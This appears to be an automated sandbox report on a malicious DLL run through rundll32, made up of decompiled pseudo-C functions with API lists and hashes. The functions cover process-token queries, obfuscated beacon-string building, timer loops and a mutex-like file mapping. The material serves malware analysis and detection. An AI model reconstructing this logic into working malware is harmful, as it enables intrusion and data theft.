                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 3a9d0d2214d893b17a8099cc3019afb5b67f61f85fde00f4f3cbf19cc045ef12
                                          • Instruction ID: 9fae6c2616e44b66202dde2b0ea923bc67f21ce87c922fef9fed15d8b6a79a72
                                          • Opcode Fuzzy Hash: 3a9d0d2214d893b17a8099cc3019afb5b67f61f85fde00f4f3cbf19cc045ef12
                                          • Instruction Fuzzy Hash: D0811C71900119AFDF11DFA9DC84AEEBBF9FF44300F1045AAEA09E7250D735AA49CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E04BF71B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E04BF58BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E04BF147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04BF7200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04BF7213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04BF722F
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04BF724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04BF7259
                                          • NtClose.NTDLL(?), ref: 04BF726B
                                          • NtClose.NTDLL(00000000), ref: 04BF7275
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 5bcd75721600747d1d41b724a65590542669ca723d5781aa25fba3a6ee01134e
                                          • Instruction ID: 485bf28c5ebc336dd4f0c0bb100a365c254dc12c8447a6c13f7e2e9ab200e11d
                                          • Opcode Fuzzy Hash: 5bcd75721600747d1d41b724a65590542669ca723d5781aa25fba3a6ee01134e
                                          • Instruction Fuzzy Hash: 482105B290021CBBDF019F98CC859DEBFBDFF58740F104062FA08A6110D7759B659BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E04BF1754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				signed int _t115;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x4bfd018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x4bfd014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x4bfd010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x4bfd00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t3 = _t65 + 0x4bfe633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x4bfd02c,  *0x4bfd004, _t60);
                                          				_t68 = E04BF57AB();
                                          				_t69 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t4 = _t69 + 0x4bfe673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E04BF73E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t7 = _t130 + 0x4bfe8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x4bfd238, 0, _v8);
                                          				}
                                          				_t74 = E04BF614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x4bfd2a4; // 0x24da5a8
                                          					_t11 = _t125 + 0x4bfe8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x4bfd238, 0, _v8);
                                          				}
                                          				_t150 =  *0x4bfd324; // 0x70d95b0
                                          				_t76 = E04BF757B(0x4bfd00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					RtlFreeHeap( *0x4bfd238, _t156, _a16); // executed
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x4bfd238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x4bfd238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E04BF749F(GetTickCount());
                                          					_t83 =  *0x4bfd324; // 0x70d95b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x4bfd324; // 0x70d95b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x4bfd324; // 0x70d95b0
                                          					_t152 = E04BF4D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x4bfd238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x4bfc294);
                                          					_t95 =  *0x4bfd2a4; // 0x24da5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x4bfe252; // 0x616d692f
                                          					_t97 = E04BF9DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x4bfd238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E04BFA5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E04BF6106();
                                          						L22:
                                          						HeapFree( *0x4bfd238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E04BF2F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_t115 = E04BFA060(_t161, _a4, _a8, _a12); // executed
                                          						_v12 = _t115;
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E04BF147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E04BF1600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E04BF147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04BF1768
                                          • wsprintfA.USER32 ref: 04BF17B8
                                          • wsprintfA.USER32 ref: 04BF17D5
                                          • wsprintfA.USER32 ref: 04BF1801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF1813
                                          • wsprintfA.USER32 ref: 04BF1834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF1844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04BF1872
                                          • GetTickCount.KERNEL32 ref: 04BF1883
                                          • RtlEnterCriticalSection.NTDLL(070D9570), ref: 04BF1897
                                          • RtlLeaveCriticalSection.NTDLL(070D9570), ref: 04BF18B5
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04BF52FE,?,070D95B0), ref: 04BF4D57
                                            • Part of subcall function 04BF4D2C: lstrlen.KERNEL32(?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D5F
                                            • Part of subcall function 04BF4D2C: strcpy.NTDLL ref: 04BF4D76
                                            • Part of subcall function 04BF4D2C: lstrcat.KERNEL32(00000000,?), ref: 04BF4D81
                                            • Part of subcall function 04BF4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BF52FE,?,070D95B0), ref: 04BF4D9E
                                          • StrTrimA.SHLWAPI(00000000,04BFC294,?,070D95B0), ref: 04BF18EC
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?,00000000,00000000,04BF5335,616D692F,00000000), ref: 04BF9DFB
                                            • Part of subcall function 04BF9DEF: lstrlen.KERNEL32(?), ref: 04BF9E03
                                            • Part of subcall function 04BF9DEF: lstrcpy.KERNEL32(00000000,?), ref: 04BF9E1A
                                            • Part of subcall function 04BF9DEF: lstrcat.KERNEL32(00000000,?), ref: 04BF9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04BF1919
                                          • lstrcpy.KERNEL32(?,?), ref: 04BF1921
                                          • lstrcat.KERNEL32(?,?), ref: 04BF192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04BF1935
                                            • Part of subcall function 04BFA5E9: lstrlen.KERNEL32(?,00000000,04BFD330,00000001,04BF937A,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?), ref: 04BFA5F2
                                            • Part of subcall function 04BFA5E9: mbstowcs.NTDLL ref: 04BFA619
                                            • Part of subcall function 04BFA5E9: memset.NTDLL ref: 04BFA62B
                                          • wcstombs.NTDLL ref: 04BF19C8
                                            • Part of subcall function 04BFA060: SysAllocString.OLEAUT32(?), ref: 04BFA09B
                                            • Part of subcall function 04BFA060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04BFA11E
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04BF1A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04BF1A15
                                          • HeapFree.KERNEL32(00000000,?,?,070D95B0), ref: 04BF1A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF1A2D
                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04BF1A39
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 603507560-0
                                          • Opcode ID: 8e7a3d3b948f5046693dc6b3f3f3966808661eef6b22c3ce095eebad04e13a13
                                          • Instruction ID: c0d80746eeca1e7de153a18864fd8e90a1721c19e0d092848a2a5308118f94fd
                                          • Opcode Fuzzy Hash: 8e7a3d3b948f5046693dc6b3f3f3966808661eef6b22c3ce095eebad04e13a13
                                          • Instruction Fuzzy Hash: 0D913871900108EFDB11DFA8DC88A9ABBB9EF08314B114495FA0DE7260D739ED56DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 4bf9b6f-4bf9ba1 memset CreateWaitableTimerA 98 4bf9ba7-4bf9c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->98 99 4bf9d23-4bf9d29 GetLastError 97->99 101 4bf9c8b-4bf9c91 98->101 102 4bf9c06-4bf9c09 98->102 100 4bf9d2d-4bf9d37 99->100 103 4bf9c92-4bf9c96 101->103 104 4bf9c0b call 4bf68cf 102->104 105 4bf9c14 102->105 106 4bf9c98-4bf9ca0 HeapFree 103->106 107 4bf9ca6-4bf9caa 103->107 110 4bf9c10-4bf9c12 104->110 109 4bf9c1e 105->109 106->107 107->103 111 4bf9cac-4bf9cb6 CloseHandle 107->111 112 4bf9c22-4bf9c27 109->112 110->105 110->109 111->100 113 4bf9c3a-4bf9c68 call 4bf9f11 112->113 114 4bf9c29-4bf9c30 112->114 118 4bf9c6a-4bf9c75 113->118 119 4bf9cb8-4bf9cbd 113->119 114->113 115 4bf9c32 114->115 115->113 118->112 120 4bf9c77-4bf9c87 call 4bf54ac 118->120 121 4bf9cbf-4bf9cc5 119->121 122 4bf9cdc-4bf9ce4 119->122 120->101 121->101 125 4bf9cc7-4bf9cda call 4bf6106 121->125 123 4bf9cea-4bf9d18 _allmul SetWaitableTimer WaitForMultipleObjects 122->123 123->112 126 4bf9d1e 123->126 125->123 126->101
                                          C-Code - Quality: 83%
                                          			E04BF9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x4bfd240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L04BFB088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x4bfd26c; // 0x3d0
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x4bfd24c = 5;
                                          						} else {
                                          							_t68 = E04BF68CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x4bfd260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E04BF9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E04BF54AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x4bfd244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x4bfd248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E04BF6106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x4bfd248);
                                          								L21:
                                          								L04BFB088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x4bfd238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 04BF9B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04BF9B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04BF9BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04BF9BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?), ref: 04BF9BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?,00000000), ref: 04BF9CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?,00000000,?,?), ref: 04BF9CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04BF9CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04BF9D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BF9D10
                                            • Part of subcall function 04BF68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,070D9388,00000000,?,7519F710,00000000,7519F730), ref: 04BF691E
                                            • Part of subcall function 04BF68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,070D93C0,?,00000000,30314549,00000014,004F0053,070D937C), ref: 04BF69BB
                                            • Part of subcall function 04BF68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04BF9C10), ref: 04BF69CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04BF4AC4,?,00000000,?,?), ref: 04BF9D23
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: bfe6dff0ee474c01df516fd9de3a92b310eec70559ad35a25be7b697b9bba6b2
                                          • Instruction ID: 170a90028692b5cde018ba9e171c3cfddbea4500a8462c67778e5e6646e64169
                                          • Opcode Fuzzy Hash: bfe6dff0ee474c01df516fd9de3a92b310eec70559ad35a25be7b697b9bba6b2
                                          • Instruction Fuzzy Hash: 36516DB1408314BFD710AF65DC44E5BBBE8FF85724F504A1AF9A983150E774E948CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04BF1A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L04BFB082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t5 = _t13 + 0x4bfe836; // 0x70d8dde
                                          				_t6 = _t13 + 0x4bfe59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L04BFAD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x4bfd2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53,?,?), ref: 04BF1A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04BF1A70
                                          • _snwprintf.NTDLL ref: 04BF1A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,04BFD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04BF1AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53,?), ref: 04BF1AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04BF1ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53), ref: 04BF1AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04BF4996,?,?,4D283A53,?), ref: 04BF1B03
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: e789ad928f0af97d913c2c103f2cb9681e327ec4c64687693457f8cc9b9e60b2
                                          • Instruction ID: 74c606e30fc184258152f3395e76565478672d8b61131fd4d705472c8055d17a
                                          • Opcode Fuzzy Hash: e789ad928f0af97d913c2c103f2cb9681e327ec4c64687693457f8cc9b9e60b2
                                          • Instruction Fuzzy Hash: CD219F76600208FBD721EBBCCC45F997BB9EB44701F154162FA0EA7190E674ED4A8B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
